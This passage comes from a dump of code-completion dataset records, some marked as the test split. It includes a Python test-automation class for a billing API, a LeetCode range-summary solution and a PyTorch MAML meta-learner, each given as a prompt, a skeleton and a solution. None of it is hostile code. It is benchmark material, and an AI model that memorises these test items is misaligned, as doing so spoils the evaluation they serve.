t4=workdate, t5=workstatus, t7=workday)\n alimport = AlImport()\n alimport.login(self.login_phone)\n alimport.ali_import(myLocalFile=myLocalFile_advance, myObjectName=myObjectName_advance)\n self.get_ent(entname=entname)\n req = self.create_api(url=WeekBillGen_ImportCheck, SheetName='Sheet1', BucketKey=bucketname, EnterpriseID=self.entid, FileName=myObjectName_advance, SettleBeginDate=SettleBeginDate, SettleEndDate=SettleEndDate)\n try:\n BizID = req.json()['Data']['BizID']\n for i in range(5):\n req = self.create_api(WeekBillGen_GetImportCheckResult, BizID=BizID, EnterpriseID=self.entid)\n time.sleep(1)\n if req.json()['Data']['State'] == 2:\n break\n req = self.create_api(WeekBillGen_GenerateBatchByBizID, ImportBizID=BizID, EnterpriseID=self.entid)\n bizid = req.json()['Data']['BizID']\n print(bizid)\n for i in range(5):\n req = self.create_api(WeekBillGen_GetGenerateBatchResult, BizID=bizid, EnterpriseID=self.entid)\n time.sleep(1)\n if req.json()['Data']['State'] == 2:\n break\n except Exception as e:\n print(e, req.json())\n<|end_body_2|>\n\n<|body_start_3|>\n if BeginDt is None or EndDt is None:\n BeginDt = self.SettleBeginDate\n EndDt = self.SettleEndDate\n if Entname is not None:\n self.get_ent(Entname)\n EntId = self.entid\n else:\n EntId = -9999\n if Operator is None:\n Operator = self.Name\n if agentname is None:\n SrceSpId = -9999\n else:\n SrceSpId = self.get_agent(agentname)\n req = self.create_api(WeekBill_Select, BeginDt=BeginDt, EndDt=EndDt, BillWeeklyBatchId=-9999, EntId=EntId, SrceSpId=SrceSpId, BillAudit=BillAudit, BillSrce=-9999, Operator=Operator, TrgtSpId=-9999, RecordIndex=0, RecordSize=10)\n print(req)\n print(req.json())\n self.billid = req.json()['Data']['RecordList'][0]['BillWeeklyBatchId']\n return self.billid\n<|end_body_3|>\n\n<|body_start_4|>\n req = {}\n billid = self.select_weekbill(agentname=agentname)\n if status == 1:\n req = self.create_api(WeekBill_Confirm, BillWeeklyBatchId=billid)\n elif status == 2:\n req = self.create_api(WeekBill_UnConfirm, BillWeeklyBatchId=billid)\n result = req.json()['Desc']\n return result\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000164", "length_bytes": 6131, "license_type": "no_license", "methods": [{"docstring": "获取来源id :param agentname: 来源名称 :return: self.agentid 来源id", "name": "get_agent", "signature": "def get_agent(self, agentname)"}, {"docstring": "获取标准企业id :param entname: 标准企业名称 :return: self.entid 标准企业id", "name": "get_ent", "signature": "def get_ent(self, entname)"}, {"docstring": "# 可预支导入 :param entname: 标准企业名称 必填 :param SettleBeginDate: 预支周期开始日期,必填 :param name:会员名称,必填 :param SettleEndDate:预支周期结束日期,必填 :param idcadnum:会员身份证号码,必填 :param workcard:会员工牌,必填 :param workdate:会员入职日期,必填 :param workstatus:会员在职状态,选填,默认在职 :param workday:上班天数,选填,默认6天 :return:", "name": "advance_import", "signature": "def advance_import(self, entname, SettleBeginDate, name, SettleEndDate, idcadnum, workcard, workdate, workstatus='在职', workday=6)"}, {"docstring": "# 查询可预支账单 :param agentname: 来源名称,可选,默认None :param BeginDt:预支周期开始日期,可选,默认None :param EndDt:预支周期结束日期,可选,默认None :param BillAudit:账单审核状态,可选,默认1:待审核,2已审核,3审核不通过 :param Entname: :param Operator: :return:", "name": "select_weekbill", "signature": "def select_weekbill(self, agentname=None, BeginDt=None, EndDt=None, BillAudit=1, Entname=None, Operator=None)"}, {"docstring": "审核可预支订单 :param agentname: 来源名称,必填 :param status: 审核状态,可选,默认 1:审核通过,2:审核不通过 :return:", "name": "audit_weekbill", "signature": "def audit_weekbill(self, agentname, status=1)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_001311", "prompt": "Implement the Python class `AdvanceManage` described below.\n\nClass description:\nImplement the AdvanceManage class.\n\nMethod signatures and docstrings:\n- def get_agent(self, agentname): 获取来源id :param agentname: 来源名称 :return: self.agentid 来源id\n- def get_ent(self, entname): 获取标准企业id :param entname: 标准企业名称 :return: self.entid 标准企业id\n- def advance_import(self, entname, SettleBeginDate, name, SettleEndDate, idcadnum, workcard, workdate, workstatus='在职', workday=6): # 可预支导入 :param entname: 标准企业名称 必填 :param SettleBeginDate: 预支周期开始日期,必填 :param name:会员名称,必填 :param SettleEndDate:预支周期结束日期,必填 :param idcadnum:会员身份证号码,必填 :param workcard:会员工牌,必填 :param workdate:会员入职日期,必填 :param workstatus:会员在职状态,选填,默认在职 :param workday:上班天数,选填,默认6天 :return:\n- def select_weekbill(self, agentname=None, BeginDt=None, EndDt=None, BillAudit=1, Entname=None, Operator=None): # 查询可预支账单 :param agentname: 来源名称,可选,默认None :param BeginDt:预支周期开始日期,可选,默认None :param EndDt:预支周期结束日期,可选,默认None :param BillAudit:账单审核状态,可选,默认1:待审核,2已审核,3审核不通过 :param Entname: :param Operator: :return:\n- def audit_weekbill(self, agentname, status=1): 审核可预支订单 :param agentname: 来源名称,必填 :param status: 审核状态,可选,默认 1:审核通过,2:审核不通过 :return:", "prompted_full_text": "Implement the Python class `AdvanceManage` described below.\n\nClass description:\nImplement the AdvanceManage class.\n\nMethod signatures and docstrings:\n- def get_agent(self, agentname): 获取来源id :param agentname: 来源名称 :return: self.agentid 来源id\n- def get_ent(self, entname): 获取标准企业id :param entname: 标准企业名称 :return: self.entid 标准企业id\n- def advance_import(self, entname, SettleBeginDate, name, SettleEndDate, idcadnum, workcard, workdate, workstatus='在职', workday=6): # 可预支导入 :param entname: 标准企业名称 必填 :param SettleBeginDate: 预支周期开始日期,必填 :param name:会员名称,必填 :param SettleEndDate:预支周期结束日期,必填 :param idcadnum:会员身份证号码,必填 :param workcard:会员工牌,必填 :param workdate:会员入职日期,必填 :param workstatus:会员在职状态,选填,默认在职 :param workday:上班天数,选填,默认6天 :return:\n- def select_weekbill(self, agentname=None, BeginDt=None, EndDt=None, BillAudit=1, Entname=None, Operator=None): # 查询可预支账单 :param agentname: 来源名称,可选,默认None :param BeginDt:预支周期开始日期,可选,默认None :param EndDt:预支周期结束日期,可选,默认None :param BillAudit:账单审核状态,可选,默认1:待审核,2已审核,3审核不通过 :param Entname: :param Operator: :return:\n- def audit_weekbill(self, agentname, status=1): 审核可预支订单 :param agentname: 来源名称,必填 :param status: 审核状态,可选,默认 1:审核通过,2:审核不通过 :return:\n\n<|skeleton|>\nclass AdvanceManage:\n\n def get_agent(self, agentname):\n \"\"\"获取来源id :param agentname: 来源名称 :return: self.agentid 来源id\"\"\"\n <|body_0|>\n\n def get_ent(self, entname):\n \"\"\"获取标准企业id :param entname: 标准企业名称 :return: self.entid 标准企业id\"\"\"\n <|body_1|>\n\n def advance_import(self, entname, SettleBeginDate, name, SettleEndDate, idcadnum, workcard, workdate, workstatus='在职', workday=6):\n \"\"\"# 可预支导入 :param entname: 标准企业名称 必填 :param SettleBeginDate: 预支周期开始日期,必填 :param name:会员名称,必填 :param SettleEndDate:预支周期结束日期,必填 :param idcadnum:会员身份证号码,必填 :param workcard:会员工牌,必填 :param workdate:会员入职日期,必填 :param workstatus:会员在职状态,选填,默认在职 :param workday:上班天数,选填,默认6天 :return:\"\"\"\n <|body_2|>\n\n def select_weekbill(self, agentname=None, BeginDt=None, EndDt=None, BillAudit=1, Entname=None, Operator=None):\n \"\"\"# 查询可预支账单 :param agentname: 来源名称,可选,默认None :param BeginDt:预支周期开始日期,可选,默认None :param EndDt:预支周期结束日期,可选,默认None :param BillAudit:账单审核状态,可选,默认1:待审核,2已审核,3审核不通过 :param Entname: :param Operator: :return:\"\"\"\n <|body_3|>\n\n def audit_weekbill(self, agentname, status=1):\n \"\"\"审核可预支订单 :param agentname: 来源名称,必填 :param status: 审核状态,可选,默认 1:审核通过,2:审核不通过 :return:\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n req = self.create_api(get_agent, CoopSts=1, RecordIndex=0, RecordSize=9999)\n agentlist = req.json()['Data']['RecordList']\n self.agentid = None\n for i in range(len(agentlist)):\n if agentname == agentlist[i]['LaborName']:\n self.agentid = agentlist[i]['SpId']\n return self.agentid\n<|end_body_0|>\n\n<|body_start_1|>\n print(entname)\n req = self.create_api(GetPaySalaryEntList_Api, CoopSts=1, RecordIndex=0, RecordSize=9999)\n print(req.json())\n entlist = req.json()['Data']['RecordList']\n for i in range(len(entlist)):\n try:\n if entname == entlist[i]['EntShortName']:\n self.entid = entlist[i]['EntId']\n print(type(self.entid))\n except Exception as e:\n print(e, '未找到标准企业', entname)\n return self.entid\n<|end_body_1|>\n\n<|body_start_2|>\n self.SettleBeginDate = SettleBeginDate\n self.SettleEndDate = SettleEndDate\n edit_exc(t1=name, t2=idcadnum, t3=workcard, t4=workdate, t5=workstatus, t7=workday)\n alimport = AlImport()\n alimport.login(self.login_phone)\n alimport.ali_import(myLocalFile=myLocalFile_advance, myObjectName=myObjectName_advance)\n self.get_ent(entname=entname)\n req = self.create_api(url=WeekBillGen_ImportCheck, SheetName='Sheet1', BucketKey=bucketname, EnterpriseID=self.entid, FileName=myObjectName_advance, SettleBeginDate=SettleBeginDate, SettleEndDate=SettleEndDate)\n try:\n BizID = req.json()['Data']['BizID']\n for i in range(5):\n req = self.create_api(WeekBillGen_GetImportCheckResult, BizID=BizID, EnterpriseID=self.entid)\n time.sleep(1)\n if req.json()['Data']['State'] == 2:\n break\n req = self.create_api(WeekBillGen_GenerateBatchByBizID, ImportBizID=BizID, EnterpriseID=self.entid)\n bizid = req.json()['Data']['BizID']\n print(bizid)\n for i in range(5):\n req = self.create_api(WeekBillGen_GetGenerateBatchResult, BizID=bizid, EnterpriseID=self.entid)\n time.sleep(1)\n if req.json()['Data']['State'] == 2:\n break\n except Exception as e:\n print(e, req.json())\n<|end_body_2|>\n\n<|body_start_3|>\n if BeginDt is None or EndDt is None:\n BeginDt = self.SettleBeginDate\n EndDt = self.SettleEndDate\n if Entname is not None:\n self.get_ent(Entname)\n EntId = self.entid\n else:\n EntId = -9999\n if Operator is None:\n Operator = self.Name\n if agentname is None:\n SrceSpId = -9999\n else:\n SrceSpId = self.get_agent(agentname)\n req = self.create_api(WeekBill_Select, BeginDt=BeginDt, EndDt=EndDt, BillWeeklyBatchId=-9999, EntId=EntId, SrceSpId=SrceSpId, BillAudit=BillAudit, BillSrce=-9999, Operator=Operator, TrgtSpId=-9999, RecordIndex=0, RecordSize=10)\n print(req)\n print(req.json())\n self.billid = req.json()['Data']['RecordList'][0]['BillWeeklyBatchId']\n return self.billid\n<|end_body_3|>\n\n<|body_start_4|>\n req = {}\n billid = self.select_weekbill(agentname=agentname)\n if status == 1:\n req = self.create_api(WeekBill_Confirm, BillWeeklyBatchId=billid)\n elif status == 2:\n req = self.create_api(WeekBill_UnConfirm, BillWeeklyBatchId=billid)\n result = req.json()['Desc']\n return result\n<|end_body_4|>\n", "revision_id": "7240500e63599033d904ac60b788ce4e8eec8746", "skeleton": "<|skeleton|>\nclass AdvanceManage:\n\n def get_agent(self, agentname):\n \"\"\"获取来源id :param agentname: 来源名称 :return: self.agentid 来源id\"\"\"\n <|body_0|>\n\n def get_ent(self, entname):\n \"\"\"获取标准企业id :param entname: 标准企业名称 :return: self.entid 标准企业id\"\"\"\n <|body_1|>\n\n def advance_import(self, entname, SettleBeginDate, name, SettleEndDate, idcadnum, workcard, workdate, workstatus='在职', workday=6):\n \"\"\"# 可预支导入 :param entname: 标准企业名称 必填 :param SettleBeginDate: 预支周期开始日期,必填 :param name:会员名称,必填 :param SettleEndDate:预支周期结束日期,必填 :param idcadnum:会员身份证号码,必填 :param workcard:会员工牌,必填 :param workdate:会员入职日期,必填 :param workstatus:会员在职状态,选填,默认在职 :param workday:上班天数,选填,默认6天 :return:\"\"\"\n <|body_2|>\n\n def select_weekbill(self, agentname=None, BeginDt=None, EndDt=None, BillAudit=1, Entname=None, Operator=None):\n \"\"\"# 查询可预支账单 :param agentname: 来源名称,可选,默认None :param BeginDt:预支周期开始日期,可选,默认None :param EndDt:预支周期结束日期,可选,默认None :param BillAudit:账单审核状态,可选,默认1:待审核,2已审核,3审核不通过 :param Entname: :param Operator: :return:\"\"\"\n <|body_3|>\n\n def audit_weekbill(self, agentname, status=1):\n \"\"\"审核可预支订单 :param agentname: 来源名称,必填 :param status: 审核状态,可选,默认 1:审核通过,2:审核不通过 :return:\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AdvanceManage:\n def get_agent(self, agentname):\n \"\"\"获取来源id :param agentname: 来源名称 :return: self.agentid 来源id\"\"\"\n req = self.create_api(get_agent, CoopSts=1, RecordIndex=0, RecordSize=9999)\n agentlist = req.json()['Data']['RecordList']\n self.agentid = None\n for i in range(len(agentlist)):\n if agentname == agentlist[i]['LaborName']:\n self.agentid = agentlist[i]['SpId']\n return self.agentid\n\n def get_ent(self, entname):\n \"\"\"获取标准企业id :param entname: 标准企业名称 :return: self.entid 标准企业id\"\"\"\n print(entname)\n req = self.create_api(GetPaySalaryEntList_Api, CoopSts=1, RecordIndex=0, RecordSize=9999)\n print(req.json())\n entlist = req.json()['Data']['RecordList']\n for i in range(len(entlist)):\n try:\n if entname == entlist[i]['EntShortName']:\n self.entid = entlist[i]['EntId']\n print(type(self.entid))\n except Exception as e:\n print(e, '未找到标准企业', entname)\n return self.entid\n\n def advance_import(self, entname, SettleBeginDate, name, SettleEndDate, idcadnum, workcard, workdate, workstatus='在职', workday=6):\n \"\"\"# 可预支导入 :param entname: 标准企业名称 必填 :param SettleBeginDate: 预支周期开始日期,必填 :param name:会员名称,必填 :param SettleEndDate:预支周期结束日期,必填 :param idcadnum:会员身份证号码,必填 :param workcard:会员工牌,必填 :param workdate:会员入职日期,必填 :param workstatus:会员在职状态,选填,默认在职 :param workday:上班天数,选填,默认6天 :return:\"\"\"\n self.SettleBeginDate = SettleBeginDate\n self.SettleEndDate = SettleEndDate\n edit_exc(t1=name, t2=idcadnum, t3=workcard, t4=workdate, t5=workstatus, t7=workday)\n alimport = AlImport()\n alimport.login(self.login_phone)\n alimport.ali_import(myLocalFile=myLocalFile_advance, myObjectName=myObjectName_advance)\n self.get_ent(entname=entname)\n req = self.create_api(url=WeekBillGen_ImportCheck, SheetName='Sheet1', BucketKey=bucketname, EnterpriseID=self.entid, FileName=myObjectName_advance, SettleBeginDate=SettleBeginDate, SettleEndDate=SettleEndDate)\n try:\n BizID = req.json()['Data']['BizID']\n for i in range(5):\n req = self.create_api(WeekBillGen_GetImportCheckResult, BizID=BizID, EnterpriseID=self.entid)\n time.sleep(1)\n if req.json()['Data']['State'] == 2:\n break\n req = self.create_api(WeekBillGen_GenerateBatchByBizID, ImportBizID=BizID, EnterpriseID=self.entid)\n bizid = req.json()['Data']['BizID']\n print(bizid)\n for i in range(5):\n req = self.create_api(WeekBillGen_GetGenerateBatchResult, BizID=bizid, EnterpriseID=self.entid)\n time.sleep(1)\n if req.json()['Data']['State'] == 2:\n break\n except Exception as e:\n print(e, req.json())\n\n def select_weekbill(self, agentname=None, BeginDt=None, EndDt=None, BillAudit=1, Entname=None, Operator=None):\n \"\"\"# 查询可预支账单 :param agentname: 来源名称,可选,默认None :param BeginDt:预支周期开始日期,可选,默认None :param EndDt:预支周期结束日期,可选,默认None :param BillAudit:账单审核状态,可选,默认1:待审核,2已审核,3审核不通过 :param Entname: :param Operator: :return:\"\"\"\n if BeginDt is None or EndDt is None:\n BeginDt = self.SettleBeginDate\n EndDt = self.SettleEndDate\n if Entname is not None:\n self.get_ent(Entname)\n EntId = self.entid\n else:\n EntId = -9999\n if Operator is None:\n Operator = self.Name\n if agentname is None:\n SrceSpId = -9999\n else:\n SrceSpId = self.get_agent(agentname)\n req = self.create_api(WeekBill_Select, BeginDt=BeginDt, EndDt=EndDt, BillWeeklyBatchId=-9999, EntId=EntId, SrceSpId=SrceSpId, BillAudit=BillAudit, BillSrce=-9999, Operator=Operator, TrgtSpId=-9999, RecordIndex=0, RecordSize=10)\n print(req)\n print(req.json())\n self.billid = req.json()['Data']['RecordList'][0]['BillWeeklyBatchId']\n return self.billid\n\n def audit_weekbill(self, agentname, status=1):\n \"\"\"审核可预支订单 :param agentname: 来源名称,必填 :param status: 审核状态,可选,默认 1:审核通过,2:审核不通过 :return:\"\"\"\n req = {}\n billid = self.select_weekbill(agentname=agentname)\n if status == 1:\n req = self.create_api(WeekBill_Confirm, BillWeeklyBatchId=billid)\n elif status == 2:\n req = self.create_api(WeekBill_UnConfirm, BillWeeklyBatchId=billid)\n result = req.json()['Desc']\n return result\n", "source": "the_stack_v2_python_sparse", "source_path": "common/lib/comm_func/advance_management.py", "source_repo": "yhtnumberone/automatic_test", "split": "test", "star_events_count": 0} {"blob_id": "385ef34a2f14e971caa2756b9ef50679dd9034b2", "bodies": ["length = len(nums)\nans = []\ni = 0\nwhile i < length:\n j = i\n res = str(nums[i])\n while i + 1 < length and nums[i + 1] - nums[i] == 1:\n i += 1\n if i > j:\n res += '->' + str(nums[i])\n ans.append(res)\n i += 1\nreturn ans", "tmp = []\nfor i in nums:\n if not tmp:\n tmp.append([i, i])\n elif i - tmp[-1][1] == 1:\n tmp[-1][1] = i\n else:\n tmp.append([i, i])\nans = []\nfor x, y in tmp:\n if x == y:\n ans.append('{}'.format(x))\n else:\n ans.append('{}->{}'.format(x, y))\nreturn ans"], "bodies_text": "<|body_start_0|>\n length = len(nums)\n ans = []\n i = 0\n while i < length:\n j = i\n res = str(nums[i])\n while i + 1 < length and nums[i + 1] - nums[i] == 1:\n i += 1\n if i > j:\n res += '->' + str(nums[i])\n ans.append(res)\n i += 1\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n tmp = []\n for i in nums:\n if not tmp:\n tmp.append([i, i])\n elif i - tmp[-1][1] == 1:\n tmp[-1][1] = i\n else:\n tmp.append([i, i])\n ans = []\n for x, y in tmp:\n if x == y:\n ans.append('{}'.format(x))\n else:\n ans.append('{}->{}'.format(x, y))\n return ans\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def summaryRanges(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n <|body_0|>\n\n def summaryRanges_O_n(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n length = len(nums)\n ans = []\n i = 0\n while i < length:\n j = i\n res = str(nums[i])\n while i + 1 < length and nums[i + 1] - nums[i] == 1:\n i += 1\n if i > j:\n res += '->' + str(nums[i])\n ans.append(res)\n i += 1\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n tmp = []\n for i in nums:\n if not tmp:\n tmp.append([i, i])\n elif i - tmp[-1][1] == 1:\n tmp[-1][1] = i\n else:\n tmp.append([i, i])\n ans = []\n for x, y in tmp:\n if x == y:\n ans.append('{}'.format(x))\n else:\n ans.append('{}->{}'.format(x, y))\n return ans\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000165", "length_bytes": 1973, "license_type": "no_license", "methods": [{"docstring": ":type nums: List[int] :rtype: List[str]", "name": "summaryRanges", "signature": "def summaryRanges(self, nums)"}, {"docstring": ":type nums: List[int] :rtype: List[str]", "name": "summaryRanges_O_n", "signature": "def summaryRanges_O_n(self, nums)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def summaryRanges(self, nums): :type nums: List[int] :rtype: List[str]\n- def summaryRanges_O_n(self, nums): :type nums: List[int] :rtype: List[str]", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def summaryRanges(self, nums): :type nums: List[int] :rtype: List[str]\n- def summaryRanges_O_n(self, nums): :type nums: List[int] :rtype: List[str]\n\n<|skeleton|>\nclass Solution:\n\n def summaryRanges(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n <|body_0|>\n\n def summaryRanges_O_n(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n length = len(nums)\n ans = []\n i = 0\n while i < length:\n j = i\n res = str(nums[i])\n while i + 1 < length and nums[i + 1] - nums[i] == 1:\n i += 1\n if i > j:\n res += '->' + str(nums[i])\n ans.append(res)\n i += 1\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n tmp = []\n for i in nums:\n if not tmp:\n tmp.append([i, i])\n elif i - tmp[-1][1] == 1:\n tmp[-1][1] = i\n else:\n tmp.append([i, i])\n ans = []\n for x, y in tmp:\n if x == y:\n ans.append('{}'.format(x))\n else:\n ans.append('{}->{}'.format(x, y))\n return ans\n<|end_body_1|>\n", "revision_id": "2d5fa4cd696d5035ea8859befeadc5cc436959c9", "skeleton": "<|skeleton|>\nclass Solution:\n\n def summaryRanges(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n <|body_0|>\n\n def summaryRanges_O_n(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def summaryRanges(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n length = len(nums)\n ans = []\n i = 0\n while i < length:\n j = i\n res = str(nums[i])\n while i + 1 < length and nums[i + 1] - nums[i] == 1:\n i += 1\n if i > j:\n res += '->' + str(nums[i])\n ans.append(res)\n i += 1\n return ans\n\n def summaryRanges_O_n(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n tmp = []\n for i in nums:\n if not tmp:\n tmp.append([i, i])\n elif i - tmp[-1][1] == 1:\n tmp[-1][1] = i\n else:\n tmp.append([i, i])\n ans = []\n for x, y in tmp:\n if x == y:\n ans.append('{}'.format(x))\n else:\n ans.append('{}->{}'.format(x, y))\n return ans\n", "source": "the_stack_v2_python_sparse", "source_path": "SourceCode/Python/Problem/00228.Summary Ranges.py", "source_repo": "roger6blog/LeetCode", "split": "test", "star_events_count": 0} {"blob_id": "5fc02428f038e4955491e10646b8ceac2ea10497", "bodies": ["super(MetaLearner, self).__init__()\nself.n_way = n_way\nself.k_shot = k_shot\nself.meta_batchsz = meta_batchsz\nself.beta = beta\nself.num_updates = num_updates\nself.learner = Learner(net_cls, *net_cls_args)\nself.optimizer = optim.Adam(self.learner.parameters(), lr=beta)", "hooks = []\nfor i, v in enumerate(self.learner.parameters()):\n\n def closure():\n ii = i\n return lambda grad: sum_grads_pi[ii]\n hooks.append(v.register_hook(closure()))\nself.optimizer.zero_grad()\ndummy_loss.backward()\nself.optimizer.step()\nfor h in hooks:\n h.remove()", "sum_grads_pi = None\nmeta_batchsz = support_y.size(0)\naccs = []\nfor i in range(meta_batchsz):\n _, grad_pi, episode_acc = self.learner(support_x[i], support_y[i], query_x[i], query_y[i], self.num_updates)\n accs.append(episode_acc)\n if sum_grads_pi is None:\n sum_grads_pi = grad_pi\n else:\n sum_grads_pi = [torch.add(i, j) for i, j in zip(sum_grads_pi, grad_pi)]\ndummy_loss, _ = self.learner.net_forward(support_x[0], support_y[0])\nself.write_grads(dummy_loss, sum_grads_pi)\nreturn accs", "meta_batchsz = support_y.size(0)\naccs = []\nfor i in range(meta_batchsz):\n _, _, episode_acc = self.learner(support_x[i], support_y[i], query_x[i], query_y[i], self.num_updates)\n accs.append(episode_acc)\nreturn np.array(accs).mean()"], "bodies_text": "<|body_start_0|>\n super(MetaLearner, self).__init__()\n self.n_way = n_way\n self.k_shot = k_shot\n self.meta_batchsz = meta_batchsz\n self.beta = beta\n self.num_updates = num_updates\n self.learner = Learner(net_cls, *net_cls_args)\n self.optimizer = optim.Adam(self.learner.parameters(), lr=beta)\n<|end_body_0|>\n\n<|body_start_1|>\n hooks = []\n for i, v in enumerate(self.learner.parameters()):\n\n def closure():\n ii = i\n return lambda grad: sum_grads_pi[ii]\n hooks.append(v.register_hook(closure()))\n self.optimizer.zero_grad()\n dummy_loss.backward()\n self.optimizer.step()\n for h in hooks:\n h.remove()\n<|end_body_1|>\n\n<|body_start_2|>\n sum_grads_pi = None\n meta_batchsz = support_y.size(0)\n accs = []\n for i in range(meta_batchsz):\n _, grad_pi, episode_acc = self.learner(support_x[i], support_y[i], query_x[i], query_y[i], self.num_updates)\n accs.append(episode_acc)\n if sum_grads_pi is None:\n sum_grads_pi = grad_pi\n else:\n sum_grads_pi = [torch.add(i, j) for i, j in zip(sum_grads_pi, grad_pi)]\n dummy_loss, _ = self.learner.net_forward(support_x[0], support_y[0])\n self.write_grads(dummy_loss, sum_grads_pi)\n return accs\n<|end_body_2|>\n\n<|body_start_3|>\n meta_batchsz = support_y.size(0)\n accs = []\n for i in range(meta_batchsz):\n _, _, episode_acc = self.learner(support_x[i], support_y[i], query_x[i], query_y[i], self.num_updates)\n accs.append(episode_acc)\n return np.array(accs).mean()\n<|end_body_3|>\n", "class_docstring": "As we have mentioned in Learner class, the metalearner class will receive a series of loss on different tasks/episodes on theta_pi network, and it will merage all loss and then sum over it. The summed loss will be backproped on theta network to update theta parameters, which is the initialization point we want to find.", "class_name": "MetaLearner", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MetaLearner:\n \"\"\"As we have mentioned in Learner class, the metalearner class will receive a series of loss on different tasks/episodes on theta_pi network, and it will merage all loss and then sum over it. The summed loss will be backproped on theta network to update theta parameters, which is the initialization point we want to find.\"\"\"\n\n def __init__(self, net_cls, net_cls_args, n_way, k_shot, meta_batchsz, beta, num_updates):\n \"\"\":param net_cls: class, not instance. the class of specific Network for learner :param net_cls_args: tuple, args for net_cls, like (n_way, imgsz) :param n_way: :param k_shot: :param meta_batchsz: number of tasks/episode :param beta: learning rate for meta-learner :param num_updates: number of updates for learner\"\"\"\n <|body_0|>\n\n def write_grads(self, dummy_loss, sum_grads_pi):\n \"\"\"write loss into learner.net, gradients come from sum_grads_pi. Since the gradients info is not calculated by general backward, we need this function to write the right gradients into theta network and update theta parameters as wished. :param dummy_loss: dummy loss, nothing but to write our gradients by hook :param sum_grads_pi: the summed gradients :return:\"\"\"\n <|body_1|>\n\n def forward(self, support_x, support_y, query_x, query_y):\n \"\"\"Here we receive a series of episode, each episode will be learned by learner and get a loss on parameters theta. we gather the loss and sum all the loss and then update theta network. setsz = n_way * k_shotf querysz = n_way * k_shot :param support_x: [meta_batchsz, setsz, c_, h, w] :param support_y: [meta_batchsz, setsz] :param query_x: [meta_batchsz, querysz, c_, h, w] :param query_y: [meta_batchsz, querysz] :return:\"\"\"\n <|body_2|>\n\n def pred(self, support_x, support_y, query_x, query_y):\n \"\"\"predict for query_x :param support_x: :param support_y: :param query_x: :param query_y: :return:\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(MetaLearner, self).__init__()\n self.n_way = n_way\n self.k_shot = k_shot\n self.meta_batchsz = meta_batchsz\n self.beta = beta\n self.num_updates = num_updates\n self.learner = Learner(net_cls, *net_cls_args)\n self.optimizer = optim.Adam(self.learner.parameters(), lr=beta)\n<|end_body_0|>\n\n<|body_start_1|>\n hooks = []\n for i, v in enumerate(self.learner.parameters()):\n\n def closure():\n ii = i\n return lambda grad: sum_grads_pi[ii]\n hooks.append(v.register_hook(closure()))\n self.optimizer.zero_grad()\n dummy_loss.backward()\n self.optimizer.step()\n for h in hooks:\n h.remove()\n<|end_body_1|>\n\n<|body_start_2|>\n sum_grads_pi = None\n meta_batchsz = support_y.size(0)\n accs = []\n for i in range(meta_batchsz):\n _, grad_pi, episode_acc = self.learner(support_x[i], support_y[i], query_x[i], query_y[i], self.num_updates)\n accs.append(episode_acc)\n if sum_grads_pi is None:\n sum_grads_pi = grad_pi\n else:\n sum_grads_pi = [torch.add(i, j) for i, j in zip(sum_grads_pi, grad_pi)]\n dummy_loss, _ = self.learner.net_forward(support_x[0], support_y[0])\n self.write_grads(dummy_loss, sum_grads_pi)\n return accs\n<|end_body_2|>\n\n<|body_start_3|>\n meta_batchsz = support_y.size(0)\n accs = []\n for i in range(meta_batchsz):\n _, _, episode_acc = self.learner(support_x[i], support_y[i], query_x[i], query_y[i], self.num_updates)\n accs.append(episode_acc)\n return np.array(accs).mean()\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000166", "length_bytes": 9798, "license_type": "no_license", "methods": [{"docstring": ":param net_cls: class, not instance. the class of specific Network for learner :param net_cls_args: tuple, args for net_cls, like (n_way, imgsz) :param n_way: :param k_shot: :param meta_batchsz: number of tasks/episode :param beta: learning rate for meta-learner :param num_updates: number of updates for learner", "name": "__init__", "signature": "def __init__(self, net_cls, net_cls_args, n_way, k_shot, meta_batchsz, beta, num_updates)"}, {"docstring": "write loss into learner.net, gradients come from sum_grads_pi. Since the gradients info is not calculated by general backward, we need this function to write the right gradients into theta network and update theta parameters as wished. :param dummy_loss: dummy loss, nothing but to write our gradients by hook :param sum_grads_pi: the summed gradients :return:", "name": "write_grads", "signature": "def write_grads(self, dummy_loss, sum_grads_pi)"}, {"docstring": "Here we receive a series of episode, each episode will be learned by learner and get a loss on parameters theta. we gather the loss and sum all the loss and then update theta network. setsz = n_way * k_shotf querysz = n_way * k_shot :param support_x: [meta_batchsz, setsz, c_, h, w] :param support_y: [meta_batchsz, setsz] :param query_x: [meta_batchsz, querysz, c_, h, w] :param query_y: [meta_batchsz, querysz] :return:", "name": "forward", "signature": "def forward(self, support_x, support_y, query_x, query_y)"}, {"docstring": 